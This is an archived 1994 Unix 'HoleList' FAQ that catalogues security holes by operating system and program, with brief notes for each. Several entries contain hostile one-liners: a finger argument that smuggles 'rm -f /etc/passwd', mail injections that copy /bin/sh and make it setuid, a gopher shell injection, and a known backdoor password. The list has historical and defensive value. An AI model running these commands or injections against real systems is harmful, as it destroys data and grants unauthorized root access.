From HoleList F A Q Subject: HoleList v7 12/13/94 These bugs/holes are archived only as a record of security related activity and are for educational purposes only. This compilation is not meant to encourage malicious activity and is not intended to be a cookbook of cracking material. If you know of a hole or bug that is related to security and that is not listed in the follow list, please contribute by sending E-Mail to . BURST- HOLELIST --- From: HoleList Subject: Holes'n'Bugs Date: 03/03/94 These bugs/holes are archived only as a record of security related activity and are for educational purposes only. This compilation is not meant to encourage malicious activity and is not intended to be a cookbook of cracking material. If you know of a hole or bug that is related to security and that is not listed in the follow list, please contribute by sending E-Mail to . Operating System RVP Date Description (References) ================ === ======== ================================================ /bin/sh 1-- 12/12/94 IFS hole, vi () /bin/su 1-- overwrite stack somehow? () /dev/fb 1-- frame buffer devices readable/writeable, () /dev/kmem 1-- /dev/kmem shold not be o+w () /dev/mem 1-- /dev/mem shold not be o+w () /dev/*st*, *mt* 1-- generally world readable/writeable () /etc 1-- rexd + MACH ? [NeXT] /etc/ g+w daemon () 4.3 Tahoe 1-- chfn -- allows newlines/meta chars/bufsize () 4.3 Tahoe 1-- ttyA&B;A:cat zero's out passwd file () BSD 4.1 1-- Sendmail can mail directly to a file BSD 4.1 1-- can mail directly to a file BSD 4.1 1-- run set gid program, dump core, is set gid BSD 4.1 1-- lock- compiled password "hasta la vista", + ^Z () BSD <4.2? 1-- IFS w. preserve bug in vi () BSD 4.1 1-- mail directly to a file () BSD 4.1 1-- exec sgid program, dump core, core is sgid () BSD 4.1 1-- Sendmail: can mail directly to a file () BSD 4.1 1-- lock password "hasta la vista" backdoor () BSD <4.2 1-- IFS w/ preserve bug w/vi () BSD <4.2 1-- suspend mkdir, ln file you want to dir () BSD <4.2? 1-- suspend mkdir, ln file you want to dir () BSD 4.2 1-- lock -- compiled in password "hasta la vista" () BSD 4.2 1-- ln passwd file to mail spool, mail to file () BSD 4.2 1-- can truncate read only files () BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar () BSD 4.2 1-- ln -s target ~/.plan; finger user to read file () BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file () BSD 4.2 1-- adb su; change check in memory; shell out () BSD 4.2 1-- race condition, can get root via "at" () BSD 4.2 1-- lock -- compiled in password "hasta la vista" BSD 4.2 1-- ln passwd file to mail spool, mail user () BSD 4.2 1-- can truncate read only files () BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar () BSD 4.2 1-- ln -s target ~/.plan; finger user. () BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file () BSD 4.2 1-- adb su; change check in memory; shell out; su () BSD 4.2 1-- race condition, can get root via "at" () BSD 4.2 1-- /dev/kmem and /dev/mem should not be o+w () BSD 4.2 1-- signal any process by changing process group () BSD 4.3 1-- ftp -n; quote user ftp; ect. Gets root privs. () BSD 4.3 1-- lpd can overwrite file () BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell. () BSD 4.3 1-- fchown (2) can chown _any_ file () BSD 4.3 1-- race condition, get root via "at" () BSD 4.3 1-- passwd chokes on long lines, splits pw file () BSD 4.3 1-- ftp -n; quote user ftp; cd ~root, get root () BSD 4.3 1-- lpd can overwrite file () BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell () BSD 4.3 1-- fchown (2) can chown _any_ file () BSD 4.3 1-- race condition (expreserve?), root via "at" () BSD 4.3 1-- passwd chokes on long lines, splits pw file () BSD 4.3 5-- lpr -s; 1000 calls lpr re-use fname () BSD NET/2 5-- rdist(1) uses popen(3), IFS spoof () BSD NET/2 5-- lpr -s; 1000 calls lpr re-use fname () BSD ? 1-- Overwrite gets buffer -- fingerd, etc BSD ? 1-- uudecode alias can overwrite root/daemon files () BSD ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell () BSD ? 1-- rwall bug () BSD ? 1-- adb the running kernel, shell out and get root () BSD ? 1-- sendmail can mail non-root file, try twice () BSD ? 1-- rshd -- spoof via nameservice, rsh target -l uid BSD386 1-- mail";cp /bin/sh /tmp;chmod 6777 /tmp/sh" () buffer overrun 1-- chfn () chfn, chsh 1-- used to create a root account () chmod 1-- Incorrect file or directory permissions () comsat 1-- running as root, utmp o+w, writes to files () core 1-- will system dump a setgid core image? () decode 1-- decode mail alias - write non-root user files () DellSVR3.2/1.0.6 1-- Bad prot mode allows root if have sh + cc () denial 1-- easy to hog processor, memory, disc, tty, etc () DomainO/S <=10.3 1-- break root by using s/rbak; sgid/suid () DomainO/S <=10.4 5-- sendmail mail to programs () DNS 1-- SOA can control bogus reverse ip, rhosts () Domain/OS <10.3 1-- break root by using s/rbak; setgid/uid () DYNIX 3.0.14 1-- Sendmail -C file ==> displays any file. () DYNIX 3.? 1-- can get root on NFS host via root via mountd () DYNIX 3.? 1-- on non-trusted host due to bug in mount daemon () DYNIX ? 1-- rsh -l "" runs as root () DYNIX ? 1-- login: -r hostname ruser^@luser^@term^@ () elm 5-- ELM's autoreply can be used to get root () expreserve 1-- can be a huge hole () ESIX Rev. D 1-- Bad protected mode allows root if sh+cc () file mod test 1-- test file doesnt lose the suid when modified () fsck 1-- lost+found should be mode 700 () ftpd 1-- static passwd struct overwrite, wuftp < x.xx () ftpd 4.2 1-- userid not reset properly, "user root" () ftpd ? 1-- core files may contain password info () fchown 1-- test for bad group test () ftruncate 1-- can be used to change major/minor on devices () fingerd 1-- .plan hard-links - read files, fingerd () gopher 6-- Type=8 Name=shell Host=;/bin/sh Port= Path= () gnuemacs 1-- emacsclient/server allows access to files. () GN <1.19 4+- exec0::/path/prog?var=blah%0Ahack-coomands0%A () HDB 1-- nostrangers shell escape () HDB 1-- changing the owner of set uid/gid files () HDB 1-- meta escapes on the X command line () HDB 1-- ; breaks on the X line () hosts.equiv 1-- default + entry () hosts.equiv 1-- easy to spoof by bad SOA at remote site () HPUX <7.0 1-- chfn -- allows newlines, etc () HP-UX 1-- sendmail: mail directly to programs () HPUX A.09.01 1-- sendmail: mail directly to programs () HPUX ? 1-- Sendmail: versions 1.2&13.1 sm, -oQ > () IDA 1.4.4.1 1-- :include:/some/unreadable/file in ~/.forward () ICMP 4-- various icmp attacks possible () ICMP 1-- ICMP redirect packets change non-static routes () Interactive 2.x 1-- Bad protected mode allows root if sh+cc () IRIX 3.3 1-- any user can read any other user's mail. () IRIX 3.3.1 1-- any user can read any other user's mail. () IRIX 3.3/3.31 1-- sendmail- any user can read other user's mail () IRIX 4.0.X 1-- default suid scripts () IRIX 4.0.X 1-- various $PATH problems () IRIX 4.0.X 1-- sendmail race condition hole () IRIX 4.0.X 1-- lpd are vulnerable too () IRIX ? 1-- rsh -l "" runs as root () IRIX ? 1-- login: -r hostname ruser^@luser^@term^@ () IRIX ? 1-- login: -r hostname ruser^@luser^@term^@ () IRIX ? 1-- Overwrite gets buffer -- fingerd, etc () IRIX ? 1-- uudecode alias can overwrite root/daemon files () IRIX ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell () IRIX ? 1-- rwall bug () IRIX ? 1-- adb the running kernel, shell out and get root () IRIX ? 1-- mail to any non-root owned file, try twice () IRIX ? 1-- rshd- spoof via dns - rsh target -l uid () IRIX ? 1-- xwsh log hole? (yo) kernel 1-- Race conditions coupled with suid programs () lock 1-- 4.1bsd version had password "hasta la vista" () lost+found 1-- lost+found should be mode 700 () lpd 1-- overwrite files with root authority () lpr 1-- lpr -r access testing problem () lpr 5-- lpr -s; 1000 calls lpr re-use fname () lprm 1-- trusts utmp () mount 1-- "mount" should not be +x for users. () mqueue 1-- must not be mode 777! () movemail 1-- worm? () Microport 3.0 1-- ulimit 0; passwd ==> zero's out passwd file () network 1-- BSD network security based on "reserved ports" () news 1-- news receivers may execute shell commands () network 1-- kerberos () network 1-- Networks are usually very insecure. () NFS 1-- Many systems can be compromised with NFS/RPC. () NFS 1-- proxy rpc can read remote nfs files () NFS 1-- can generate NFS file handles () OSF/1 1.2 1-- write allows shell outs to gain egid term () OSF/1 1.3 1-- write allows shell outs to gain egid term () OSF/1 1.2 1-- doesn't close the fd to the term writing to () OSF/1 1.3 1-- doesn't close the fd to the term writing to () passwd 1-- fgets allows entries mangled into ::0:0::: () passwd 1-- fred:...:...:...:Fred ....Flintstone::/bin/sh () passwd 1-- IDs shouldnt contain: ;~!` M- spoof popen () portmap 1-- binding problems... () root 1-- ? (fingerd_test.sh) rcp 1-- nobody problem () rexd 1-- existence () rexd 1-- MACH ? [NeXT] /etc/ g+w daemon () rdist 1-- buffer overflow () rdist 5-- rdist(1) uses popen(3), IFS spoof () RISC/os 4.51? 1-- rsh -l "" runs as root () RPC 1-- Many systems can be compromised with NFS/RPC. () rwall 1-- running as root, utmp o+w , writes to files () SCO 3.2v4.2 5-- rdist(1) uses popen(3), IFS spoof () SCO ? 1-- rlogin to any acct to trusted host w/o pwd () SCO ? 1-- rlogin to any acct from trusted host w/o pwd () selection_svc 1-- allowed remote access to files () sendmail && bounce mail () sendmail <=5.61 1-- can mail to any file not root owned, try twice () sendmail <5.61 1-- sendmail- groups incorrectly, get group () sendmail >5.65 1-- can get daemon privalages via .forward. () sendmail ? 5++ can mail to programs (sendmal1, nmh, smail) sendmail ? 1-- debug option () sendmail ? 1-- wizard mode () sendmail ? 1-- TURN command allows mail to be stolen () sendmail ? 1-- decode mail alias - write non-root user files () sendmail ? 1-- buffer overflow cause sendmail deamon lock up () sendmail ? 1-- what uid does |program run with? () SIGNALS 1-- signal any process by changing process group () Stellix 2.0? 1-- rsh -l "" runs as root () Stellix 2.0 1-- rsh -l "" runs as root () Stellix 2.1 1-- login: -r hostname ruser^@luser^@term^@ () suid 1-- will run .profile if linked to - , IFS () suid 1-- never call system(3) and popen(3) () suid 1-- May not expect filesize signals, SIGALRMs () suid 1-- no setuid program on a mountable disk () suid 1-- ro mounting of foreign disk may allow suid. () suid 1-- .plan links () suid 1-- /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh () SunOS 3.3 1-- ftpd - userid not reset properly, "user root" () SunOS 3.5 1-- connect w/acct;user root;ls;put /tmp/f/ tmp/b () SunOS <4.0 1-- any user can run yp server () SunOS 4.0 1-- chsh -- similar to chfn () SunOS 386i 1-- rm logintool, hack login with adb, chmod 2750 () SunOS 386i/4.01? 1-- login -n root requires no password () SunOS 386i/4.01? 1-- login -n root (no password) () SunOS 4.0.1 1-- chfn buffer problems () SunOS 4.0.1 1-- chsh buffer problems () SunOS 4.0.1 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines () SunOS 4.0.3 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines () SunOS 4.0.3 1-- concurrent yppasswd sessions can trash yp map () SunOS 4.0.3 1-- mail to any non-root owned file, try twice () SunOS 4.0.3 1-- rcp buffer overflow () SunOS 4.0.3 1-- sendmail- mail to non-root file, try twice () SunOS 4.0.3 1-- ttyA&B;A:cat can r/w any () Ultrix 2.0? 1-- Sendmail -C file ==> displays any file. () Ultrix 2.2? 1-- Sendmail -C file ==> displays any file. () Ultrix 2.2 1-- ln passwd file to mail spool, mail to user () Ultrix 2.2 1-- on a non-trusted host due to bug in mountd () Ultrix 2.2 1-- Sendmail: -C file ==> displays any file () Ultrix 2.2 1-- can get root on NFS host via root via mountd () Ultrix 2.2 1-- get root on host running NFS from other root () Ultrix 3.0 1-- lock -- compiled in password "hasta la vista" () Ultrix 3.0 1-- login -P progname allows run programs as root () Ultrix 3.0 1-- login can run any program with root privs () Ultrix 3.0 1-- ln -s target ~/.plan; finger user to access () Ultrix 3.0 1-- any user can mount any filesystem () Ultrix 3.0 1-- X11 doesn't clear pwds in mem; /dev/mem is o+w () Ultrix <3.1 1-- limit file 0; passwd -->zero's out passwd file () Ultrix <3.1 1-- lpd can overwrite any file (back to 2.0?) () Ultrix 3.1? 1-- rshd: spoof via nameservice, rsh target -l uid () Ultrix 3.1? 1-- allows newlines, meta chars, buffsize problem () Ultrix <4.1 1-- overflow RISC reg buffer, get root w/ mail () Ultrix ? 1-- rshd -- spoof via dns, rsh target -l uid () Ultrix ? 1-- ypbind takes ypset from all; spoof yp DB () Ultrix ? 1-- yppasswd leaves yp data files world writable () Ultrix ? 1-- chfn -- allows newlines, meta chars, bufsize () Ultrix ? 1-- ftp -n; quote user ftp; ect Gets root privs () Ultrix ? 1-- can change host name, mount any filesystem () Ultrix ? 1-- uudecode alias can overwrite root/daemon files () Ultrix ? 4-- ICMP not handled correctly (nuke) Ultrix ? 1-- emacsclient/server allows access to files () Ultrix ? 1-- lock: password "hasta la vista" backdoor () Ultrix ? 1-- /dev/kmem and /dev/mem should not be o+w () Ultrix ? 1-- can change physical ethernet address () UNIX 1-- / must not be go+w () utmp 1-- etc/utmp o+w ? () utmp 1-- check to see if world writeable (rwall, comsat) utmp 1-- syslog messages can overwrite any file () uucp 1-- check valid UUCP akts in the /etc/ftpusers () uucp 1-- echo "myhost myname">x;uucp x ~uucp/.rhosts () uucp 1-- uucico shows ph num, login, passwd, of remote () uudecode 1-- if it is setuid, may create setuid files () uusend 1-- uusend may call "uux" while suid to root () uux 1-- uusend may call "uux" while suid to root () X11R? 1-- snoop on keyboards and bitmaps () X11R3 1-- can set log on and exec (fixed in "fix-6") X11R4 1-- can set log on and exec (fixed in "fix-6") X11R ? 1-- snoop on keyboards and bitmaps () X11R5 5++ xterm can create files (xterm1__) xhost 1-- if + , anyone can connect to X server () ypbind 1-- accepts ypset from anyone ()